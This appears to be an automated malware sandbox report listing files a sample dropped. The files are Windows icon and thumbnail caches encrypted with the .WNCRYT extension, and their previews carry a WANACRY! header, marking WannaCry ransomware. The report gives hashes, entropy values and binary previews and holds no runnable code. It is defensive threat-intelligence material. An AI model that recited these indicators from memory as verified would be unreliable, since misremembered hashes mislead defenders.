                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.259574592736034
                                Encrypted:false
                                SSDEEP:6:bkECwce1LOlMmEovlklYqWyDpjzHMHNt7qXp28DHkdV2DAVC1LJgSn:bkECGL0zEo9k+q3jbOi52eSV2+C1iS
                                MD5:7A41FD7E66D85A47BF4A6312DB88E0A8
                                SHA1:AE609F098B2C075B1B1DC0DE95EBE833F62CAE2A
                                SHA-256:DBFE3D8895639732FA9A1F66E2E3E94AABF4A6C9EA9F56AA2BCB73A0BAE282CE
                                SHA-512:E70925331E89890B6ABAD57808009CF37FC1572D7EE07797CD9EACFF108B4D0F5774ADD9EF8ED7767CBAFBF3E370B07A1A83E50DF81273174D0797FBF689F37A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....p;...../U....:.p_.Y...'....GVGi....QHw.>1z.......PmS+."......%..j...1...l....r........|.....R..8..L.+..AY....G.3 ........7..wqh...m..)V...w~..KD.An%%..YNh....G...."[....H..'E6....+...r..c3.pt^}qc......./..0...(....a..9..H7.T..D.......k....................3U..#..3yE.e!^......[J...^

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999822199189562
                                Encrypted:true
                                SSDEEP:24576:ijcZ3vborrisEuO/w2WwzgAuVNjFTaF7X7RswMA:acZ3DoPisRAD8NohCwP
                                MD5:54393ECF0C5BAA85D73001B86E8E9CAC
                                SHA1:730E572B483F20A9BCF5AB046F430EF82D43DE87
                                SHA-256:A51A198EA62012578CB380DE88690DB2227951DCAF71467E6F20D4035796CD42
                                SHA-512:C842C0B73875A3B6A3F58C690325FE7A5E323DD8CEA58D0F0E3D4D4B11320FFAECAF4FEAF58FC8CC7EF52ED7EE51102D7129CE2DBFD34E82CB5176DD66B00839
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....&...i..w1....E...Q.*;.Y....i].....k...>.E.Qk>..!...`.v.'..j.7......g.s......x..Y..g.<j\...{...-.H.gt..S:.......J"....T+....Y.0\.....Ob....g.'...)..n......4.G........[6...Ph.<...W...a..-1..3...v..../*%.m.f..Av.UB.......ht..B..,.`.r..K.-..v..Y.J.............. XZQj...d...N..ZN`..$(....3.....d..._&.cs.>e...N....d..........-,qe.......q..p..mf..3.Vw<........;.S...B..e\/G......L..F..=J..>.{....'...j..ow..........~h.......:..AiQ....3.....>..qN..^.v...2(.). .<o... .{..eB4.b.P..L>v........g..T-..?E...wb2(..}.N?....Yj?`...g.I.._03..G.X.n.qNc...l....v)25............~.....a..4..MX.......u..^..8.....q....C....@.....,....iC.<2.c..0-f..O\$.2.#.h........l.....9%..).RJ..:..J...".44.._aI....6#.H.B......!.U.$l.0#....D..I.yH....M.....4...i....!.`..e.^..T....*d.t.L....$&.W.[.wI..S..I>L...).k....3.$..Y=.......-.^f....Oe.....]....?.l".&..C...).z..2.........o.s..G...M.@...n........5..~............-..[.........@..X..J.....~.F:.0....:.]@j.....[o8.@..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.237674834414331
                                Encrypted:false
                                SSDEEP:6:bkEmbcts076z2kz4tmizP7G5o2dsswsAklzh4IFJX1/92ghGjzw9XVB5:bkE/g2kz4Hy59Z64zh4IFb12OGjzUz5
                                MD5:EA212FC7770F38122D1F57FACB87701B
                                SHA1:21C46EACBBE831710F2F90CB10E30FE3268C43F0
                                SHA-256:1FCBF64560DE22AF6B32ACE791064400DD802CCD51D2D390752AAADD28679C95
                                SHA-512:2A9FFD9040DF9EFDDD57FE7809A012A0F22D2BE7C9326B4F19C7C04CDED121B454C6565064A4FA7E812ED7810666DB91A572E8BE2563B855AC30C916F18653ED
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........-......wP...jWh.......(Hm4.|...a...>.1f2..:,Q....'..U ..AU.HV....;..,Hy..I.....N....a6.....p.E..Tu.j;.W..p...N.........?@.t.I..k3....H:U...45K...\..6.q,p....=.:.L....&.o..5.j.. .)5..,..j<eA....n=f.M.+.....v.G!...`|t$M9.....z..}Z...{.uf..:n\................{Z..5q.b...N.c....B......D.D.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5243160
                                Entropy (8bit):7.99996594205298
                                Encrypted:true
                                SSDEEP:98304:O2GF4diSxNdO2zsDUXRZF36tbOo7xmLjbWZkpsbjXFMVY2sI9RfxknQn:LfKDUXRZMOLPyv+eU9JOns
                                MD5:79E0FACC2224C4E21EB364295C84B680
                                SHA1:762E989F09E3AE592BA17F7C7124CBA62E8C76A6
                                SHA-256:EE23B8F170227B251779364379EAC5BEEE1216B0DFB1684376034B42ACD3F5B6
                                SHA-512:5CECB5BB8D892E557ED7996A214735644A7E28C26060820E7341F8F5186D58453F42DB433229524C997BF1B937FF2510F803FE795DED406EF6764417A5F21F0A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....K....bG..Y.<u6<.0g.X.>:)..a.//..K.Y6...{D..6...M.gs...'...V".....+)...!..2(.....<.i.n].#.7.w.]O.Cj....`.....1.R-..Bq...N....K.YX.1%..d.)...U....L$[.i..-..u.N4(...#..CY|..n_.c?.....&..&.d...~._....98..G...U...+.'I......N....f.H....R....?.K.<"......P......1.[m.p.?..E.{p.j..;..l..O.p...t.}M%>.L.B.X.pP.t....2l.f.OM...0..4.....i..@.6....e..io....J......#.8.I..0...@$`...MxVE3;.M.....Hb_.u.BAj...".,...6.n;..V...AC.@......5...bi!.........P.*.....&...7.Z..?...Uw.5.P.`x.#..O.P.`.'..m?#.$_66.q..._.*n,B..[..&]....o....L.....m.!B......GX.mj.w..ex.X.=}......U.e.....1...P....,...Q...B...=.P5.........._J.dY.l.>%.U.#..rx.B....?:.3...S....U."h.....<...P,. f......x@..`f.+H.Q.m...'..?.q..w.....~W.JJ.....e".......m`........+..q..@..=...;...1.A..w.l. .:._[...K.).r...a5.IF.iXF....n.1=...e.H.IB.m..!5Hj.(......n.N^.m.q..D...]..Ss=..\I...#.K..:+..%.O....R.~z..R>....Sh....!K...`jM.{p...g..P.M-.N......t......x...)3.!....O.T....L......;..9.|U....V.l

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.15442429450716
                                Encrypted:false
                                SSDEEP:6:bkEIAzAOfe03x1rAHpzJ9GJXlewlk2PCWXrOS2moj2TBnUh/:bkEIAzAO0p19GJXleUk27OSzKoW
                                MD5:FB28474E0EA86E7F8848916D3501BB19
                                SHA1:BBE8E7DCE3F3276566DEB8AC4756AD42C58D2137
                                SHA-256:F74B143CD89909F0A1701F00A2D1B6EEADC093B2542D8E8BD5C0099301886FF6
                                SHA-512:493224CB7B5962AE29163F0F80C5DC6955B94A23560076DE44896A89B60561F90425F60F94297FC6047B415152AA4158C1D4EDAE11275B4CA261DCEFDEDD98BC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........A..L*.qio..C.V....'|.WQ..ia..YM.r+h..8.0.^.nor.z....R.JIk.......i?.Az.Z..L.*MZ.P..Y>...#$>B...oM...[...Z.x8.l...O.7.B...E.......U....y....5a.......]ZT.4*.`..e..q.....<kX.(.3.5.......}.O...q..C...k....../o..<.L..?.;O.Y|.....>09JC0.V..].,.J.{..l...............>Ri...~.....j\v.'.....e.....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2097432
                                Entropy (8bit):7.99990959246282
                                Encrypted:true
                                SSDEEP:49152:K1oJvRfb7nrWS+XIzHoS3r0CduPLJSS7j:KIRX+Yzo40CduzJbv
                                MD5:3CA01E46E36689E39B77D59D86099EE9
                                SHA1:8232EE4D5E9524EA5E241E48146333F094DFCC36
                                SHA-256:5B7618F5B1C23D2AAD6C1D411ACD94C1A31963B73EC43ED9FECACCA12400C1D9
                                SHA-512:CBF2F5F580DB1C157E11C45D706610F841EBB6EBF07CA6B6168B04F07FDCDF849F26A1D14B3DAD28BFBA2D125F10E9E5CCB4D4095050D98FAAE6ED51B678E502
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....Y......:j..P.&m...;;u..}...=..r..&.Q..z....R.xME`9`Z.9^...X89p...P..W......B...o.At.+...^.$.M.y.d..j..........q....}k.l.LG.!........J3..A.....~.0."!...N...g....3.|..?a.Dt..{.rx6.K.....f.k&=H..CK8...=]/.n....;.RJ.k.{*N..`.....15@.#Dxb^.q`... ........ ......+Jil.]l:...%.....V..E..s..d..(..U..T?{j.94..4.Mi.jg..."$.P2.f..*.5.D..U..B...0.w....G..)g......:1.5u.$.(.8....^.K.d...c...G.>;t.C.7...:...3.'.o.`,.,<..I.{...q....R....j........=P...}..Z>.2.t...\..&....wHg.......um)&.b.....\....C.2A.G4..y....{....)..}...%.....5[.Kz..9....J..m!.;R...T.w...e.'.-..u.....`..k...j.[iFc.bx..........r,..w..z....rE..~`......k$a.....9...W..k..<..X...D..".8...).|..d....\...qR.I..Z].Rp....4.$....<......i ......!.......{|...\l....C@Z.2Mf.g".&.).F.(!L...G..|.......Z~".h..'.4D^..Rf.._qIY......S..ZP.O4*.......Z.0X...2.....,..P.<...\~Q.o..v..-....:.W.....}...G...mT..-..?;M.u..%.P.p7*..7........_F...`..}.%.72f.........R7M....;..<S.Q...x}......Hvy.`....y..[.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):3146008
                                Entropy (8bit):7.999933490439828
                                Encrypted:true
                                SSDEEP:49152:FkEAxFJSkTicodbR7VbelyV32LcQebqYyKkDgH6sJvp36PbZmnF4oJedQ22or6nv:F+wYic14VGLBeOFgdRl4oJed/2oo
                                MD5:319CA8623BEAAF68C94BE735870BB9BB
                                SHA1:4392F7FDA8968B41EE11FB2209CD14E56C067904
                                SHA-256:6CE3C324A0C08B1A2153104C766F31FFE6DEA9B1A6A08B50F27D6B86B4E73CEF
                                SHA-512:1FFB52DE49C7B9B43CD2564606F0A0C3B27DF050F1F2AAE4AA8F22937E133D0919D9701BF1E159AB7D9B1E496981C0ADF5AA4938A1BFD3BF571880718D307581
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......ueKC..4.N......?...=.),T..H...#....E.........A....Y/..>.J/.2^!.L:.......(.(.*....S4..w.<o....$..%...Q.<"...raz~.l....:n.z......n.(.......t.G.t.@.......SG}.^e.....j.4P...{E......(e)-.:".3..I......j..bF.fq..#..Y......I....>........|.}........<......0.....Q.Z..R.L.5.w.........C.f>..hL.t..gB.;....U...zo.)e..B.n.....N..+...hHN..UOL.....e#5..su9.......h..w\.3..e../2X......@&.......A...o..d...a...f.;w#tM......p...k....w.zC`.....lm..`.8...]....|.v....Xz.*S..6.(Oi....U.oXn.y.......8`-.9..J..b%..Ck}..6<o..m..M..d..&.!!.'.TL..D...w.K..R.C...Z...S.qq.~...R'....Z.p.ds.n.#..J`.~......t..E`..Gu].r..E.x..5.vl.Q....q...?r.. I.-.F...m...|.UVmo.]..*}qS....A..y...._..3..jd$.ZE.e.-k..(...&...j.....dI..Su>...n.^...o..=7...@gu"...2...^.XfZu0......C`..bJ.1\h....n-..%(g.....7f.....Fr#...9...C.h.R..z..n...V..S...h,'.."L.j..Z.j..Q. !.G...........'...*h.....48...J..Z=.w.3.dr.+j+..|...O.&U.9...[........Y..$R......n.6.N=...LV..Y&.*.v....D*..E.......<..uB

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.189867522345476
                                Encrypted:false
                                SSDEEP:6:bkExKyNDcZBQhF049IiI592+HTUpq2ov1mcWAckO55G0lYEKR:bkE1N4ZKhF0SIiK92+HT48voACrYb
                                MD5:CBBB4A055A50015486B4E78FD8EDCEFC
                                SHA1:28EADF9C094D71339F724ABC5E77704C568E957A
                                SHA-256:CD50F5577391D15F44CE77B144AF9E8F03130CF91D9C2E881FF6EA5DC6CD9920
                                SHA-512:865389B3DF86EE83DA18333F23B34E5E5D94AC742699E2F1F0AAC638F00A0F1E1C2FB00A2A4A33D1347360DDC2C2B068DEEE5469F1673066B8D4F9191DAD48AC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....W...Wd.P-..q...q..........h....4T.....=5.....g.z{.Md|.....*.@^ NFd.:x......T.O<...{..S$.p%.4..M..o..&..a.j..*.'3.4.[\.......,...\|.Sh..7..=..])Q.........%fS.O.5T.....p.U.c.ua.`.....}.A....\.SY?(.OaoW5..r...:.U.......X....e2.P....9.=f.+.....42........................@.]A6....>.,/p..U...?.t

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.206614739699949
                                Encrypted:false
                                SSDEEP:6:bkEsvsEdv2lrtYarAuRIC40SM5Yv9PkPa2D0K+GFveara1:bkETEduBbAuRy0FO98C2v+Omam1
                                MD5:F86AC348C86C3ADD154EE6E63F64B549
                                SHA1:60D9203CC86414EAAC7BB2B37900C1C62084F375
                                SHA-256:6E3820B9081B134788FC1724DE43959E656456933C12D9E560478F5A3D601753
                                SHA-512:3971B094AA13D2401B197D5193B3B51A28854EE8CE87BBD486F23568DB99A8351992D7EECA44F322BB215D869FB79D5DDAE6520C1F34B117621BB1A3C01A2765
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....H..\..i.e5}....r...`....&t..._..`.h.SLX...Ho...aS.K,..&c.L=..O.a....$u......26mVB..c.....v......5.....0.........X&.h+Y..D..!7...^0..\._...u.\+..*S..4.LqB".enX...y9.N+....W.........[.b.+...{.Y..[=...$..z..._..O(...7...).....F}..[(.........c....3Q.................L........c..x..8...P5<.O...

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.150896541029274
                                Encrypted:false
                                SSDEEP:6:bkEjO4xCoR+SL3YR3jOYxDBXtkgeuAUDI15bOq/S6+mk2G/9oe4Q8wR:bkEjO4xCoR+C3mjVxlXttbDIvYd2aoV4
                                MD5:FF3986338045ACB4CBD3CCDE8BC0BA28
                                SHA1:4955AD1CCECA6C90C2D85384923E440FA367C2C3
                                SHA-256:9F3E25B0410A7E6FE3D7DE54CEB4AC44C598EEF070CB4D7BDA41661A1E1DE7E2
                                SHA-512:A2E6839D0071DF87CAD042EE24550C9B630C64A44DBD8A4A383018E6EFE170F74BB7310C7BC78E10F6DD68E0A5D232AFE8C953BF72A501D98F6851B0E1E0E65C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Q.<.}...W|...2k.o..A...X4....v..TNg..ZK..~.$~....p.z.....5C.l...4...F.O..o.t.".s.D<D.2.k{.C-U.T.[..\..lv.v.....hz..#... #.y..9}..hH....7f.B..z%..=9.1...ql.p....5..rD~....l.E....?h....A..'.n...t.'.3iC.....'.y..y.)..#j.."._v1%..:.8.4..F@.eX.R..g..............8..Ub......Xc...$........_..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.216427429019806
                                Encrypted:false
                                SSDEEP:6:bkEBjwUfLkY8ruGuK9j6TuRXoXB1QMMg8VnY9vMgg6C8cKZGihjiKjgv:bkEhrkY8D99j6s4fGnYvMgLC8cKHBpsv
                                MD5:1B6AA22E35D5F2356CDEFE91B1FBB033
                                SHA1:4D26F8B6B6E54CC081E0B230C315AA953ADCD963
                                SHA-256:7A7CC473CCD0EFFCAFBF4904933BD93B95A6B4FA262B763A3734BC72B9ACEC54
                                SHA-512:46D78F3CDEF6726CCFEB0293FFFAF4F0CF11A7DF83478BF4587A921633FCBC8C196DA2D9516050B1809CE1AD884DB0F919102B18C228EF59BEA718109879AE55
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....$.a.P.lA'....>.A.......*.f@]..|.A.0.].>.....X.SE...%.A....nf....c......_...(...wV....c.~...r.R<.c..2....I8.....Xr....UD..p..K..[....n.gS`u..... ...]...J....?.... .GR..(..?o=]?...Y[.Y....=..~.m..s.r.WF.X|#.g..KGJ..'.....Y...%.-1]8....yD5..^I8................|...#q....cm{..W.s.H[./..X..}..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):58600
                                Entropy (8bit):7.997065787476011
                                Encrypted:true
                                SSDEEP:1536:BA1M4qpS8/WL6E4/wIjUKAuElilFIqpsJ9ZxsdFMk9i:u1kpS8OL6E44IYDkE9/sfM8i
                                MD5:5537FB6E33AE5A8C33A6976B445DC7A0
                                SHA1:D5DE05D1135CC337086C27C85FA40371465926AD
                                SHA-256:8DAA084A671F3F311630CD8562E622B17CC2A518F994512B5357654D3A9E8D26
                                SHA-512:72458F3543DB6726E0E3388C866905DF773527D879560A656081A9A58D3BBB21429849915414037198A305CDF5056CDF18181CEBE971A11D91D334F78742CB3B
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....,......g.....6.e....e..V..7..%.w!.4.....B....&0}.qTx.4'=Ol~9iB.J.9a=8.B/.HY...z0......N.(..c ..>.5.B:P.....A.z.<m..ez].xs2gt1......>..{L..{z...X....L!m.`84..U..C.1..41|.G..!6....F*...Y..%.Xw.[...{.uc....</..]..k.QW..w....3[q....c....7)...0~..............m{..N..h.;..K.5..+08G.M....SLVD_^A/....V..a.....ud$.~Q.........X.F_1.,&E!^......n......A....a...Fr..i.8.Jh......_-....#..:.......).x...<`B..k,iBw.u.EN..z.6v...V.$$y..W<..*.]s.9).}3..x.1`.....6..|,6TZ[p`.".$h.8.k..Z... ......Cd....M..y.!.w`v.kQ.......^a0.B/.XN.E..V^..].u.....b$./l.M..7.-."...q.B.>T..a...+p..}.E...m..4.r..Kd.M..Nq.............\....m+n._.'...u...k..'/}-.eh...7..9.._..;y..,d.AJ+.T"..Z.AT......vw.....S..Hd{QK..>..-}._.Z..'....U....h-..;CJ?...3..{M0...d..l.{...W....p.E..F.9R......Z...j.:.ZsFx......P.Gq.u.(\8{.`.o.em.mp.k/{;^mWL.Y.\.......AFV.......8.....Y...A...%..ID..x7....s...#..].....T-..)7}.7...e.Fs....PpR.........c#..>c......t...<.j.A.Y....RJ....z.1.....E.V. .

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.203832619697974
                                Encrypted:false
                                SSDEEP:6:bkEM1zi/KkiHo/Uf92A0pMrLQqa57rLo7qipSadBGhCbB+xGA/:bkEA8V/M2AQMrwXjipdLBaX/
                                MD5:FBE8FC050E6156270C059B94BAEA2E33
                                SHA1:F34F2DD07D75F81ADCB4C4804979B038DEB1AE0A
                                SHA-256:88026380874E811707B8420FFDE318127BAFF52BCEB1165C4F3E6015585E1579
                                SHA-512:B980842BA033D23B4734675D5FF213C2B014C0CB761C2F7FC852DAA15D27DF74A5D1A306218860211D437F52CB966EC716988EB223CC044FA35F9C594C58603F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....R....P......;\....,Q..C.MV..........@HY4En_..[.j.F.............)=.Y.....4.D...|.^b".[.-...:`.x.L.is(..{.ck.sv)....M....w...P1qE5.$......U].....~....N......M .`.0I.;..%..!.i.B......)...B.....w.?.dG._..GW.^M(.".ZLlm!H"..S...&..XfD..J.a.9.Y..M..............P.d...<n .z9.,.k...:..%F.{.]../s

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.288358086298042
                                Encrypted:false
                                SSDEEP:6:bkEbcTAmI5SId6m0vTg+5p5tb3JFs53LbiRd6tgWPUXZqyInzzsf/rHEYIWn:bkEgTTI5SIdX0vM+DzLspiTXUyInC/bx
                                MD5:9BDB7601CF10257F391D9CD37F1BB546
                                SHA1:5DD5E785F206394DD7B6C21078B044C1D24F1DD9
                                SHA-256:2D38329EB4892F18D1FE241E3613C94432C817F36D8F5AEE6B1241085C8418E9
                                SHA-512:DD922B63CD9BF93E9D38DA2C384106BCB89C156A5C7F35B04F6C87974E7D45B27F3F705794D7979F1E1B02D32F70F6F4B0F4588EDC67AB06DA9335E8BE6BCEFB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......G'.V.eo4OP..~d....;7X=w...t....../B...e-.@.....[.qp..7.(....rW.l..........Y...4..E..v.Z.s..<].9...9.yj.v...!.E..>.....*p&......K..<Md..W.:..p..v.1Y..z..,d....(.........jc.(n......]CE.E...ph.Dg..f[.V..,..-.....r~.x...}.*..h.I|.......'}z.K......................^.p'i|.b.......\.....I.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.162405784877906
                                Encrypted:false
                                SSDEEP:6:bkEP4BpZjFCG24miYkmBMheMj3NP9cB94d6N9P7rKmV9/FNty:bkEPYr24mHkuM/j9Pn6db/FNty
                                MD5:42279516F2AC09504202316140EFFB8E
                                SHA1:4380A355F3C34B4E66D015A96A56A1E18C899CA1
                                SHA-256:BCC7252653EACF3EE2A3EB1B3941BB52647181D7C0862AB004DCA7980B297CD1
                                SHA-512:2199AD83E8B61B193EC5E76A81AC85A96E3E42B6E497604A22D6ABC8F533C9D63C1D203AC540C000FE0D44093EE9621B7EA37743A37A1651FEAD0596F8FDD187
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!...........f.w...A-T_A.7P.~.[..C.8N........l.......s..Y..Q,. .B...^`.p~t.n...7.t.!-........%.p..>..2...tX..B..;...^.aY..Z.NC.t..*.......G...Ww.:..U...m~^...7....^7_.us"....X...js...hw:...C.^(.m..V.\.L...f.w...W~........JPF..!.Q..........A............z'....fx..D..!K...v.....>.]..#..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.0749597806960445
                                Encrypted:false
                                SSDEEP:6:bkEvVu14fX88zM4ePH+0Cekj0BH7M7CegiL8QNdIUL+ypeFMK1n:bkEv014/PgC0CekQ7BegxQP+zWK1n
                                MD5:6DBF616E2EC4BA08F36EC5CD3C3DA899
                                SHA1:D9FC06ACD7D15E3D28757715363E068CA76B3431
                                SHA-256:69FFA122972B2ADE67C724D536DDF3ADDD8B4B7947B306677E3060B751392F10
                                SHA-512:9DBAB8B13EA45FBD48DD9C0E8EC53522A540DA34FA1AB1A30F9B79CCE3AA7E1C440D1EC0ADF12DD10E5C08F4528BDBB78E1D2F7CA3CEAF6DB7328C0B17B4D52A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......d..-j8 .?.......%U.{.U7$..._..]Y....6..........E<.<}..y.......^Px...;.kn...i.%..&.b.2s.GWmb....\..v...#b...8...C..p..^.3.h.m..t.U7.su.V.xAN5.?b..p...{.'.....m.h...N..0#..i ..k..D8.P...n..5...u....?:5mi1N..|......|ug8......#.....q..P|............k].o.)=.6..e.mmm.8..6|.1.l....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999794843985097
                                Encrypted:true
                                SSDEEP:24576:Ij+b2R3MMJ9asrYp7zacAbXgQ08nv13isRC1De:IcP2trYpfacAVv1q1a
                                MD5:E04923575480F6A6A9E6400F8E2BDA03
                                SHA1:95FD7D33165D5ACB195F0FC2F972F8D17F372CC2
                                SHA-256:F20F3C08045D7D337B52756873C20F82587F35D988F4FF206DFC9A93974629C8
                                SHA-512:B4272002465117A1A83689F32F28F7956EDCBCA914C5A5D02CE09F17B1006E567885337D79524FCF902D9F65DAF256378FCDB4E445612BF9B1877F23E25B6C41
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........S-.A..%..H`Ti.. .`"(.I........@.....$b..Io.h<.... ...o..btJ$Mr...L.....ul.....RP?Q.s................f..../........B...r...C..m..K_...^C.T.....u..w`K.C.......*r4$...v.,..0pV...D....n.@w.1=.ld....YH.a*Fx...i..o_......X..z8J..3K..V..b`mX.[..m>F?b...............=.....m,.}.....1.+.m"7.p|.2Ecf..XC.&%'d.r<$@.o.z...fXL.........kv.=..U.[.cg.`.../T.=...,.....8.<...&..(b.A..t.31.k........~c"#.....>...;..?m.Q..[..?...t!...S1i.4....Hqi.32].....,._p..+....../...d...e.d...~./j..'.'.h.................Z.h....f+.L.x'...whV.........6.uD....6.P.MF/1s..J.o.C.gmn-........:qO.:(v.4.C.....+\.S.B(x.<`..A.f.*.t.R..h..".R...B.........^5.7...&y.qu-*{q.=.!~..oa..#*.....|U.b..Ue..QK.4..`...~.....|.k..zp...O.....|E?..L$(J#..c r.'..w..6.I).vm..f..9#..'.S.....*......\....vo&d...<..2...:w...2/....Nz......K..5...rqt:..vv.".n....".G.j...^..V'.'<.R.dwhl..f&.m.o3.-.....[.].6...>.!.M..O...)...b..`...C.L7..*....j.VB?.f.Q....r.$<......&|.u.y.Pg...h.i...Zq.,#../C`.n..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.214702797864241
                                Encrypted:false
                                SSDEEP:6:bkEReywdJDMLb50W7mqOicdlt+ljj+/WJ5bEquw+lTnLjxPQilFcE:bkEws50V1nl49r3bEqcZmilFN
                                MD5:2733F8FF40B6AD97E9E3099088F09716
                                SHA1:A782348CF89B9798E4D70682DA5C06BC61C8F62B
                                SHA-256:9AC40AA544183EC0D6ED87403E16E3F48311C111BA8BCAF28AB4ED2C76CF6AC0
                                SHA-512:BEBF350C9A182FC682A4B23AF1B3435F8086DD27C7DE861DECC4E079708C6E87894B810A41F8E36B8D66FF6E7E3318A6158AAFCBB7EDA16D1146A075F4FE39F7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......b_.Z.x3k#.Xg6.j'cM.z......6..(.P....g"......1.0w\P@....G..0$.. .6.......z.0.....u.Q.....XO.l......z.n7V.{....B.D..U...q.......b..&..B...e.w.~......D..o...^R...$..V2gh.......!.......Tt8D...3&D..3.L$....:hV.....b"y.l.&3=...[Ts..zmS.r53L................W..?%..i..No.bi..j.{..y..5

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.9998378899815314
                                Encrypted:true
                                SSDEEP:24576:WrfZWD34n1YGOdFPsi7uHiVVOyLlXkQzjcrvh3+IMhFLo:8RWb41cFP3WiL5XkQzjLIM3s
                                MD5:C1E3D0671C6D5DE14592A349E1092F48
                                SHA1:84827112C4CC23DA886507AE490D5BDE9AEED19D
                                SHA-256:311941878ECEC19701F5DD7939E931A0D5D21B8A5AB8A262091120E9C0AA472C
                                SHA-512:7647A75F98430BC47651EC778066BA9EDF0E0059C781EA65F3F8BDE6477A414D09C94424AE1A0388FDFC44469DC31283DF1FA8B09DA48AAAABD923DA1EB5701D
                                Malicious:true
                                Reputation:unknown
